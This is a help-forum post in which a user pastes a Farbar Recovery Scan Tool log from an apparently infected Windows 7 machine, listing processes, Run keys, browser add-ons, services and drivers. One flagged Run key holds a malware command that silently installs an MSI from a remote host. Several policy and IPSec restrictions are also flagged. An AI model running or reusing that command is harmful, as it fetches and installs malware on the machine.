Virus(es) in Windows. Problems. Solutions. (II)

markusMj

Junior Member
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 27.01.2018
Ran by Markus (administrator) on MARKUS-ПК (07-02-2018 16:40:34)
Running from C:\Users\Markus\Desktop\FRST
Loaded Profiles: Markus (Available Profiles: Markus)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: Русский (Россия)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.02\AsSysCtrlService.exe
(E-MU Systems) C:\Windows\System32\emaudsv.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\CisTray.exe
(SafeNet Inc.) C:\Windows\System32\hasplms.exe
(Ибах О. И.) C:\Program Files (x86)\Energy Controller 2\EnergyController2.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7Debug\mdm.exe
() C:\Program Files (x86)\Common Files\Rhozet\Carbon Coder\Kernel\PNXSERVR.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
() C:\Program Files\Prio\prio_svc.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
() C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe
() C:\Program Files (x86)\Common Files\Rhozet\Carbon Coder\Kernel\PNXKERNL.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cis.exe
(Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [11613288 2010-11-19] (Realtek Semiconductor)
HKLM\...\Run: [Start WingMan Profiler] => C:\Program Files\Logitech\Gaming Software\LWEMon.exe [190536 2010-06-15] (Logitech Inc.)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION
HKLM\...\Run: [COMODO Internet Security] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1275608 2014-03-05] (COMODO)
HKLM-x32\...\Run: [UpdReg] => C:\Windows\UpdReg.EXE [90112 2000-05-11] (Creative Technology Ltd.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [946352 2012-12-03] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [vmware-tray.exe] => C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe [105040 2013-03-30] (VMware, Inc.)
HKLM-x32\...\Run: [vmware-tray] => C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe [105040 2013-03-30] (VMware, Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QT Lite\QTTask.exe [421888 2013-05-01] (Apple Inc.)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [9080768 2017-12-14] (AVAST Software)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\...\Run: [AlcoholAutomount] => C:\Program Files (x86)\Alcohol Soft\Alcohol 120\AxAutoMntSrv.exe [33120 2010-08-20] (Alcohol Soft Development Team)
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\...\Run: [Energy Controller 2] => C:\Program Files (x86)\Energy Controller 2\EnergyController2.exe [2174464 2012-01-30] (Ибах О. И.)
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\...\Run: [DAEMON Tools Pro Agent] => C:\Program Files\DAEMON Tools Pro\DTAgent.exe [3111744 2012-04-26] (DT Soft Ltd)
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\...\MountPoints2: J - J:\Launcher.exe
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\...\MountPoints2: {2509e17e-7eed-11e3-a225-005056c00008} - J:\Launcher.exe
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\...\MountPoints2: {eb9c51e7-4af1-11e2-b73e-ddab5332bf92} - J:\Launcher.exe
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\...\MountPoints2: {eb9c51e9-4af1-11e2-b73e-ddab5332bf92} - J:\Launcher.exe
AppInit_DLLs: prio.dll => C:\Program Files\Prio\prio.dll [12496 2010-07-28] (O&K Software)
AppInit_DLLs-x32: prio32.dll => C:\Program Files\Prio\prio32.dll [10960 2010-07-28] (O&K Software)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk [2013-01-07]
ShortcutTarget: Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office10\OSA.EXE (Microsoft Corporation)
BootExecute: autocheck autochk * Partizan
GroupPolicy: Restriction <==== ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{5218e2d6-9bb8-4649-a7d0-aaa085b1e5bc} <==== ATTENTION (Restriction - IP)
Hosts: 127.0.0.1 validation.sls.microsoft.com
Tcpip\Parameters: [DhcpNameServer] 195.95.139.24 91.216.28.254
Tcpip\..\Interfaces\{28CF20D8-E6E5-4A2C-8E52-B17998F4D4A1}: [DhcpNameServer] 195.95.139.24 91.216.28.254
 
Internet Explorer:
==================
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.yandex.ru/?clid=1782898
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://ru.msn.com/?ocid=iehp
SearchScopes: HKU\S-1-5-21-2008689014-3463650501-2238215348-1000 -> DefaultScope {01A3E930-C75D-4105-9BED-9F84195012FC} URL = hxxp://yandex.ru/yandsearch?clid=1782899&text={searchTerms}
SearchScopes: HKU\S-1-5-21-2008689014-3463650501-2238215348-1000 -> {01A3E930-C75D-4105-9BED-9F84195012FC} URL = hxxp://yandex.ru/yandsearch?clid=1782899&text={searchTerms}
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2012-12-22] (Oracle Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-12-14] (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2012-12-22] (Oracle Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-12-18] (Adobe Systems Incorporated)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2014-02-01] (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-12-14] (AVAST Software)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: IE 4.x-6.x BHO for Download Master -> {9961627E-4059-41B4-8E0E-A7D6B3854ADF} -> C:\Program Files (x86)\Download Master\dmiehlp.dll [2008-10-24] (WestByte)
BHO-x32: No Name -> {D5FEC983-01DB-414a-9456-AF95AC9ED7B5} -> No File
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2014-02-01] (Oracle Corporation)
Handler-x32: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files (x86)\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL [2001-01-22] (Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2011-12-25] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2011-12-25] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2011-12-25] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2011-12-25] (Microsoft Corporation)
 
FireFox:
========
FF ProfilePath: C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\00ozl3kw.default [2018-02-07]
FF NetworkProxy: Mozilla\Firefox\Profiles\00ozl3kw.default -> ftp", "131.161.26.142"
FF Extension: (Best Proxy Switcher) - C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\00ozl3kw.default\Extensions\bestproxyswitcher@bestproxyswitcher.com.xpi [2018-01-29]
FF Extension: (FoxyProxy Standard) - C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\00ozl3kw.default\Extensions\foxyproxy@eric.h.jung [2018-01-20] [Legacy]
FF Extension: (S3.Переводчик) - C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\00ozl3kw.default\Extensions\s3google@translator.xpi [2018-01-30]
FF Extension: (User Agent Switcher) - C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\00ozl3kw.default\Extensions\{e968fc70-8f95-4ab9-9e79-304de2a71ee1}.xpi [2016-10-14] [Legacy]
FF Extension: (FoxLingo) - C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\00ozl3kw.default\Extensions\{ef62e1ce-d2a4-4cdd-b7ec-92b120366b66} [2013-06-08] [Legacy] [not signed]
FF SearchPlugin: C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\00ozl3kw.default\searchplugins\yandex.ru-212346.xml [2013-05-13]
FF SearchPlugin: C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\00ozl3kw.default\searchplugins\yqs-barff-yandex.xml [2013-01-25]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: (Avast Online Security) - C:\Program Files\AVAST Software\Avast\WebRep\FF [2017-12-14] [Legacy]
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_162.dll [2016-10-07] ()
FF Plugin: @java.com/DTPlugin,version=10.10.2 -> C:\Windows\system32\npDeployJava1.dll [2012-12-22] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.10.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2012-12-22] (Oracle Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_162.dll [2016-10-07] ()
FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-02-01] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-02-01] (Oracle Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2013-07-31] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2013-02-16] (Adobe Systems Inc.)
 
Chrome:  
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default [2018-02-07]
CHR Extension: (Презентации) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-01-17]
CHR Extension: (Документы) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-01-17]
CHR Extension: (Диск Google) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-01-17]
CHR Extension: (YouTube) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-01-17]
CHR Extension: (Disable Youtube™ HTML5 Player) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\enmofgaijnbjpblfljopnpdogpldapoc [2017-08-13]
CHR Extension: (Таблицы) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-01-17]
CHR Extension: (Google Документы офлайн) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-01-17]
CHR Extension: (Avast Online Security) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2018-01-04]
CHR Extension: (Платежная система Интернет-магазина Chrome) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-23]
CHR Extension: (Browsec VPN - Free and Unlimited VPN) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\omghfjlpggmjjaagoclmmobgdodcjboh [2018-01-16]
CHR Extension: (Gmail) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-01-17]
CHR Extension: (Chrome Media Router) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-12-13]
CHR Profile: C:\Users\Markus\AppData\Local\Google\Chrome\User Data\System Profile [2018-01-29]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2013-03-03] (Adobe Systems) [File not signed]
R2 AsSysCtrlService; C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.02\AsSysCtrlService.exe [90112 2009-08-19] (ASUSTeK Computer Inc.) [File not signed]
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [197128 2017-12-14] (AVAST Software)
R2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [6802624 2014-03-05] (COMODO)
S3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2264280 2014-03-05] (COMODO)
S3 defragsvc; C:\Windows\System32\defragsvc.dll [291328 2009-07-14] (Корпорация Майкрософт)
R2 emaudsv; C:\Windows\system32\emaudsv.exe [26624 2010-10-06] (E-MU Systems)
S2 FlexService; C:\Program Files (x86)\RapidBIT\cisvc.exe [41984 2009-05-17] (BitMicro Software Corporation) [File not signed]
R2 hasplms; C:\Windows\system32\hasplms.exe [4180576 2010-09-27] (SafeNet Inc.)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [417552 2015-03-30] (LogMeIn, Inc.)
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe [270336 2001-02-23] (Microsoft Corporation) [File not signed]
R2 Nexus Server; C:\Program Files (x86)\Common Files\Rhozet\Carbon Coder\Kernel\PNXSERVR.exe [757891 2010-12-08] () [File not signed]
R2 prio_svc; C:\Program Files\Prio\prio_svc.exe [9936 2010-07-28] ()
S3 ServiceLayer; C:\Program Files (x86)\PC Connectivity Solution\ServiceLayer.exe [628736 2010-12-08] (Nokia) [File not signed]
S2 StarWindServiceAE; C:\Program Files (x86)\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe [370688 2009-12-24] (StarWind Software) [File not signed]
S3 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [814064 2015-12-22] (Tunngle.net GmbH) [File not signed]
R2 VMwareHostd; C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe [13242960 2013-02-26] ()
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)
S3 WPCSvc; C:\Windows\System32\wpcsvc.dll [12288 2009-07-14] (Корпорация Майкрософт)
S3 WPCSvc; C:\Windows\SysWOW64\wpcsvc.dll [10752 2009-07-14] (Корпорация Майкрософт)
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
S2 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 adusbser; C:\Windows\System32\DRIVERS\adusbser.sys [145024 2008-01-02] (AnyDATA Corporation)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [13440 2009-08-04] ()
S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [37656 2017-12-14] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [108816 2017-12-14] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [103064 2017-12-14] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [74544 2017-12-14] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [969184 2017-12-14] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [513632 2017-12-14] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [163416 2017-12-14] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [293352 2017-12-14] (AVAST Software)
S3 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [270904 2017-06-21] (Bluestack System Inc. )
R1 cmderd; C:\Windows\System32\DRIVERS\cmderd.sys [23168 2014-03-05] (COMODO)
R1 cmdGuard; C:\Windows\System32\DRIVERS\cmdguard.sys [738472 2014-03-05] (COMODO)
R1 cmdHlp; C:\Windows\System32\DRIVERS\cmdhlp.sys [48360 2014-03-05] (COMODO)
S3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
S3 ElbyCDFL; C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
S3 emusba10; C:\Windows\System32\DRIVERS\emusba10.sys [215000 2010-10-06] (E-MU Systems)
R1 inspect; C:\Windows\System32\DRIVERS\inspect.sys [105552 2014-03-05] (COMODO)
R0 mountmgr; C:\Windows\System32\drivers\mountmgr.sys [94592 2010-11-21] (Корпорация Майкрософт)
R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [15416 2009-07-16] ()
R1 networx; C:\Windows\System32\drivers\networx.sys [56968 2011-02-08] (NetFilterSDK.com)
U0 Partizan; C:\Windows\SysWOW64\drivers\Partizan.sys [40304 2017-07-20] (Greatis Software)
R1 PStrip64; C:\Windows\System32\drivers\pstrip64.sys [13008 2006-09-30] ()
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [564824 2013-03-03] (Duplex Secure Ltd.)
S3 tap0901t; C:\Windows\System32\DRIVERS\tap0901t.sys [47736 2015-12-21] (Tunngle.net)
R1 VBoxUSBMon; C:\Windows\System32\DRIVERS\VBoxUSBMon.sys [127432 2015-09-16] (BigNox Corporation)
R2 VMparport; C:\Windows\system32\drivers\VMparport.sys [31824 2013-02-26] (VMware, Inc.)
R0 volmgrx; C:\Windows\System32\drivers\volmgrx.sys [363392 2010-11-21] (Корпорация Майкрософт)
R0 vsock; C:\Windows\System32\drivers\vsock.sys [70296 2012-10-24] (VMware, Inc.)
R1 YSDrv; C:\Program Files (x86)\Bignox\BigNoxVM\RT\YSDrv.sys [270608 2017-10-22] (BigNox Corporation)
U3 a37m65i9; C:\Windows\System32\Drivers\a37m65i9.sys [0 ] (Advanced Micro Devices) <==== ATTENTION (zero byte File/Folder)
U3 ac2cjxl8; C:\Windows\System32\Drivers\ac2cjxl8.sys [0 ] (Advanced Micro Devices) <==== ATTENTION (zero byte File/Folder)
S3 cpuz139; \??\C:\Users\Markus\AppData\Local\Temp\cpuz139\cpuz139_x64.sys [X] <==== ATTENTION
S4 nvvad_WaveExtensible; system32\drivers\nvvad64v.sys [X]
S4 nvvhci; system32\DRIVERS\nvvhci.sys [X]
S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
 
========================== Drivers MD5 =======================
 
C:\Windows\System32\DRIVERS\AgileVpn.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rasl2tp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\raspppoe.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rassstp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rdbss.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rdpbus.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\RDPCDD.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdpdr.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdpencdd.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdprefmp.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdpvideominiport.sys ==> MD5 is legit
C:\Windows\System32\Drivers\RDPWD.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdyboost.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\revoflt.sys D2864254401A27FB3F5EBD495857D92C
C:\Windows\System32\DRIVERS\rspndr.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\Rt64win7.sys 09210D1340433EE0054F0DE1E0D3658F
C:\Windows\system32\drivers\vms3cap.sys ==> MD5 is legit
C:\Windows\system32\drivers\sbp2port.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\scfilter.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\serenum.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\serial.sys ==> MD5 is legit
C:\Windows\system32\drivers\sermouse.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffdisk.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffp_mmc.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffp_sd.sys ==> MD5 is legit
C:\Windows\system32\drivers\sfloppy.sys ==> MD5 is legit
C:\Windows\system32\drivers\SiSRaid2.sys ==> MD5 is legit
C:\Windows\system32\drivers\sisraid4.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\smb.sys ==> MD5 is legit
C:\Windows\System32\Drivers\spldr.sys ==> MD5 is legit
C:\Windows\System32\Drivers\sptd.sys D6AB7C13FCDD2E4CAC35244D2C172D9A
C:\Windows\System32\DRIVERS\srv.sys EB15C46477EB84B6B520871ED5936CCF
C:\Windows\System32\DRIVERS\srv2.sys 7F4FDC9528BCE6FB919615B6A77D5724
C:\Windows\System32\DRIVERS\srvnet.sys 3F20CD2A11872284BD667DAD6D4801CC
C:\Windows\system32\drivers\stexstor.sys ==> MD5 is legit
C:\Windows\System32\drivers\vmstorfl.sys ==> MD5 is legit
C:\Windows\system32\drivers\storvsc.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\swenum.sys ==> MD5 is legit
C:\Windows\System32\drivers\synth3dvsc.sys C3A39C4079305480972D29C44B868C78
C:\Windows\System32\DRIVERS\tap0901t.sys DC643A36180AD0FA9439928EF2C98D02
C:\Windows\System32\drivers\tcpip.sys FC62769E7BFF2896035AEED399108162
C:\Windows\System32\DRIVERS\tcpip.sys FC62769E7BFF2896035AEED399108162
C:\Windows\System32\drivers\tcpipreg.sys ==> MD5 is legit
C:\Windows\System32\drivers\tdpipe.sys ==> MD5 is legit
C:\Windows\System32\drivers\tdtcp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\tdx.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\termdd.sys ==> MD5 is legit
C:\Windows\system32\drivers\terminpt.sys 2B5BDFF688EC9871D7EC5837833374E9
C:\Windows\System32\DRIVERS\tssecsrv.sys ==> MD5 is legit
C:\Windows\System32\drivers\tsusbflt.sys ==> MD5 is legit
C:\Windows\system32\drivers\TsUsbGD.sys 9CC2CCAE8A84820EAECB886D477CBCB8
C:\Windows\System32\drivers\tsusbhub.sys E1748D04AE40118B62BC18AC86032192
C:\Windows\System32\DRIVERS\tunnel.sys ==> MD5 is legit
C:\Windows\system32\drivers\uagp35.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\udfs.sys ==> MD5 is legit
C:\Windows\system32\drivers\uliagpkx.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\umbus.sys ==> MD5 is legit
C:\Windows\system32\drivers\umpass.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbser_lowerfltx64.sys AFA3A0937B7044A8322D8BC91722C53B
C:\Windows\System32\DRIVERS\usbccgp.sys ==> MD5 is legit
C:\Windows\system32\drivers\usbcir.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbehci.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbhub.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbohci.sys ==> MD5 is legit
C:\Windows\system32\drivers\usbprint.sys ==> MD5 is legit
